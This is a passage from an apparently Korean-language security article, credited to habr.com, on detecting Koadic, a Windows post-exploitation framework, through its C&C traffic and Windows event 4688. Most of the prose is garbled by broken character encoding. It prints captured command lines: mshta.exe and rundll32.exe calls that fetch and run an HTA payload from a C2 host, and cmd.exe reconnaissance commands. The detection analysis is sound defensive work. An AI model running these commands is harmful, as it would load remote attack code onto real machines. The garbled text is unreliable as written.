์ ์๋ ๊ถํ์ด ๋ถ์กฑํ ๊ฒฝ์ฐ Koadic์ UAC ์ฐํ(User Account Control Bypass) ๊ธฐ์ ์ ์ฌ์ฉํ์ฌ ๊ถํ์ ๋์ผ ์ ์์ต๋๋ค.
์. 10. ์ฝ์๋ ์
ํผํด์๋ C&C ์๋ฒ์์ ํต์ ์ ์์ํด์ผ ํฉ๋๋ค. ์ด๋ฅผ ์ํด ๊ทธ๋ ๋ ๋ฏธ๋ฆฌ ์ค๋น๋ URI์ ์ ์ํ๊ณ ์คํ ์ด์ ์ค ํ๋๋ฅผ ์ฌ์ฉํ์ฌ Koadic ๋ณธ์ฒด๋ฅผ ์์ ํด์ผ ํฉ๋๋ค. ๊ทธ๋ฆผ์์. ๊ทธ๋ฆผ 11์ mshta ์คํ ์ด์ ์ ์๋ฅผ ๋ณด์ฌ์ค๋๋ค.
์. 11. CnC ์๋ฒ์์ ์ธ์
์ด๊ธฐํ
์๋ต ๋ณ์ WS์ ๋ฐ๋ฅด๋ฉด WScript.Shell์ ํตํด ์คํ์ด ์ด๋ฃจ์ด์ง๋ฉฐ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ๋ณ์์๋ ํ์ฌ ์ธ์ ์ ๋งค๊ฐ ๋ณ์์ ๋ํ ์ฃผ์ ์ ๋ณด๊ฐ ํฌํจ๋์ด ์์์ด ๋ถ๋ช ํด์ง๋๋ค. ์ด๋ CnC ์๋ฒ์์ HTTP ์ฐ๊ฒฐ์์ ์ฒซ ๋ฒ์งธ ์์ฒญ-์๋ต ์์ ๋๋ค. ํ์ ์์ฒญ์ ํธ์ถ๋ ๋ชจ๋(์ํ๋ํธ)์ ๊ธฐ๋ฅ๊ณผ ์ง์ ์ ์ผ๋ก ๊ด๋ จ๋ฉ๋๋ค. ๋ชจ๋ Koadic ๋ชจ๋์ CnC์ ํ์ฑ ์ธ์ ์์๋ง ์๋ํฉ๋๋ค.
๋ฏธ๋ฏธ ์นด์ธ
CME๊ฐ Bloodhound์ ํจ๊ป ์๋ํ๋ ๊ฒ์ฒ๋ผ Koadic์ Mimikatz์ ๋ณ๋์ ํ๋ก๊ทธ๋จ์ผ๋ก ์๋ํ๋ฉฐ ์ด๋ฅผ ์์ํ๋ ๋ค์ํ ๋ฐฉ๋ฒ์ด ์์ต๋๋ค. ๋ค์์ Mimikatz ์ํ๋ํธ ๋ค์ด๋ก๋๋ฅผ ์ํ ์์ฒญ-์๋ต ์์ ๋๋ค.
์. 12. Mimikatz๋ฅผ Koadic์ผ๋ก ์ด์
์์ฒญ์ URI ํ์์ด ์ด๋ป๊ฒ ๋ณ๊ฒฝ๋์๋์ง ํ์ธํ ์ ์์ต๋๋ค. ์ด์ ์ ํํ ๋ชจ๋์ ๋ด๋นํ๋ csrf ๋ณ์์ ๊ฐ์ด ํฌํจ๋ฉ๋๋ค. ๊ทธ๋ ์ ์ด๋ฆ์ ์ฃผ์๋ฅผ ๊ธฐ์ธ์ด์ง ๋ง์ญ์์ค. ์ฐ๋ฆฌ ๋ชจ๋๋ CSRF๊ฐ ์ผ๋ฐ์ ์ผ๋ก ๋ค๋ฅด๊ฒ ์ดํด๋๋ค๋ ๊ฒ์ ์๊ณ ์์ต๋๋ค. ์๋ต์ Koadic ๋ณธ๋ฌธ๊ณผ ๋์ผํ๋ฉฐ Mimikatz ๊ด๋ จ ์ฝ๋๊ฐ ์ถ๊ฐ๋์์ต๋๋ค. ๊ฝค ๋ฐฉ๋ํ๋ ํต์ฌ ๋ด์ฉ์ ์ดํด๋ณด๊ฒ ์ต๋๋ค. ์ฌ๊ธฐ์๋ ์ด๋ฅผ ์ฃผ์ ํ ์ง๋ ฌํ๋ .NET ํด๋์ค์ธ base64๋ก ์ธ์ฝ๋ฉ๋ Mimikatz ๋ผ์ด๋ธ๋ฌ๋ฆฌ์ Mimikatz๋ฅผ ์คํํ๊ธฐ ์ํ ์ธ์๊ฐ ์์ต๋๋ค. ์คํ ๊ฒฐ๊ณผ๋ ์ผ๋ฐ ํ ์คํธ๋ก ๋คํธ์ํฌ๋ฅผ ํตํด ์ ์ก๋ฉ๋๋ค.
์. 13. ์๊ฒฉ ์์คํ
์์ Mimikatz๋ฅผ ์คํํ ๊ฒฐ๊ณผ
Exec_cmd
Koadic์๋ ์๊ฒฉ์ผ๋ก ๋ช ๋ น์ ์คํํ ์ ์๋ ๋ชจ๋๋ ์์ต๋๋ค. ์ฌ๊ธฐ์๋ ๋์ผํ URI ์์ฑ ๋ฐฉ๋ฒ๊ณผ ์น์ํ sid ๋ฐ csrf ๋ณ์๋ฅผ ๋ณผ ์ ์์ต๋๋ค. exec_cmd ๋ชจ๋์ ๊ฒฝ์ฐ ์ ๋ช ๋ น์ด๋ฅผ ์คํํ ์ ์๋ ๋ฐ๋์ ์ฝ๋๊ฐ ์ถ๊ฐ๋๋ค. ์๋์๋ CnC ์๋ฒ์ HTTP ์๋ต์ ํฌํจ๋ ์ฝ๋๊ฐ ๋์ ์์ต๋๋ค.
์. 14. ์ํ๋ํธ ์ฝ๋ exec_cmd
์ฝ๋ ์คํ์๋ ์ต์ํ WS ์์ฑ์ด ์๋ GAWTUUGCFI ๋ณ์๊ฐ ํ์ํฉ๋๋ค. ๋์์ ๋ฐ์ ์ํ๋ํธ๋ ์์ ํธ์ถํ์ฌ ์ถ๋ ฅ ๋ฐ์ดํฐ ์คํธ๋ฆผ์ ๋ฐํํ๋ shell.exec์ ๋ฐํํ์ง ์๊ณ shell.run์ด๋ผ๋ ๋ ๊ฐ์ง ์ฝ๋ ๋ถ๊ธฐ๋ฅผ ์ฒ๋ฆฌํฉ๋๋ค.
Koadic์ ์ผ๋ฐ์ ์ธ ๋๊ตฌ๋ ์๋์ง๋ง ํฉ๋ฒ์ ์ธ ํธ๋ํฝ์์ ์ฐพ์ ์ ์๋ ์์ฒด ์ํฐํฉํธ๊ฐ ์์ต๋๋ค.
- HTTP ์์ฒญ์ ํน๋ณํ ๊ตฌ์ฑ,
- winHttpRequests API๋ฅผ ์ฌ์ฉํ์ฌ,
- ActiveXObject๋ฅผ ํตํด WScript.Shell ๊ฐ์ฒด ์์ฑ,
- ํฐ ์คํ ๊ฐ๋ฅ ๋ณธ์ฒด.
์ด๊ธฐ ์ฐ๊ฒฐ์ ์คํ ์ด์ ์ ์ํด ์์๋๋ฏ๋ก Windows ์ด๋ฒคํธ๋ฅผ ํตํด ํด๋น ํ๋์ ๊ฐ์งํ ์ ์์ต๋๋ค. mshta์ ๊ฒฝ์ฐ ์ด๋ ์์ ์์ฑ์ด ์๋ ํ๋ก์ธ์ค ์์ฑ์ ๋ํ๋ด๋ ์ด๋ฒคํธ 4688์ ๋๋ค.
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
Koadic์ด ์คํ๋๋ ๋์ ์ด๋ฅผ ์๋ฒฝํ๊ฒ ํน์ฑํํ๋ ์์ฑ์ ๊ฐ์ง ๋ค๋ฅธ 4688 ์ด๋ฒคํธ๋ฅผ ๋ณผ ์ ์์ต๋๋ค.
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
์กฐ์ฌ ๊ฒฐ๊ณผ
ํ ์ง์์ ์ํํ๋ ๊ฒฝํฅ์ด ๋ฒ์ฃ์๋ค ์ฌ์ด์์ ์ธ๊ธฐ๋ฅผ ์ป๊ณ ์์ต๋๋ค. ๊ทธ๋ค์ ํ์์ ๋ฐ๋ผ Windows์ ๋ด์ฅ๋ ๋๊ตฌ์ ๋ฉ์ปค๋์ฆ์ ์ฌ์ฉํฉ๋๋ค. ์ด ์์น์ ๋ฐ๋ฅด๋ ์ธ๊ธฐ ๋๊ตฌ์ธ Koadic, CrackMapExec ๋ฐ Impacket์ด APT ๋ณด๊ณ ์์ ์ ์ ๋ ๋ง์ด ๋ฑ์ฅํ๊ณ ์์ต๋๋ค. ์ด๋ฌํ ๋๊ตฌ์ ๋ํ GitHub์ ํฌํฌ ์๋ ์ฆ๊ฐํ๊ณ ์์ผ๋ฉฐ ์๋ก์ด ํฌํฌ๊ฐ ๋ํ๋๊ณ ์์ต๋๋ค(ํ์ฌ ์ด๋ฏธ ์ฝ XNUMX๊ฐ๊ฐ ์์ต๋๋ค). ์ด ์ถ์ธ๋ ๋จ์์ฑ์ผ๋ก ์ธํด ์ธ๊ธฐ๋ฅผ ์ป๊ณ ์์ต๋๋ค. ๊ณต๊ฒฉ์์๊ฒ๋ ํ์ฌ ๋๊ตฌ๊ฐ ํ์ํ์ง ์์ต๋๋ค. ํ์ฌ ๋๊ตฌ๋ ์ด๋ฏธ ํผํด์์ ์ปดํจํฐ์ ์กด์ฌํ๋ฉฐ ๋ณด์ ์กฐ์น๋ฅผ ์ฐํํ๋๋ก ๋์์ค๋๋ค. ์ฐ๋ฆฌ๋ ๋คํธ์ํฌ ํต์ ์ฐ๊ตฌ์ ์ค์ ์ ๋๊ณ ์์ต๋๋ค. ์์ ์ค๋ช
๋ ๊ฐ ๋๊ตฌ๋ ๋คํธ์ํฌ ํธ๋ํฝ์ ๊ณ ์ ํ ํ์ ์ ๋จ๊น๋๋ค. ์ด์ ๋ํ ์์ธํ ์ฐ๊ตฌ๋ฅผ ํตํด ์ฐ๋ฆฌ๋ ์ ํ์ ๊ฐ๋ฅด์น ์ ์์์ต๋๋ค.
์ ์:
- Anton Tyurin, Positive Technologies์ PT Expert Security Center ์ ๋ฌธ ์๋น์ค ๋ถ์ ์ฑ ์์
- Egor Podmokov, ์ ๋ฌธ๊ฐ, PT Expert Security Center, Positive Technologies
์ถ์ฒ : habr.com